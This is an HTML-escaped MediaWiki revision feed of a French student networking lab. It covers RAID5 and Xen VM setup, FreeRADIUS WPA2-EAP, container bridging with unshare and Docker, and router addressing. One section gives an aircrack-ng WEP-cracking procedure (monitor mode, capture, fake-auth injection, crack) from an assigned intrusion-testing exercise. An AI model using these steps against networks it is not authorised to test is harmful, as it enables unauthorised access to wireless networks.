  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur '''Cordouan''' =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49070</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49070"/>
				<updated>2018-12-21T11:00:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Mise en place de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
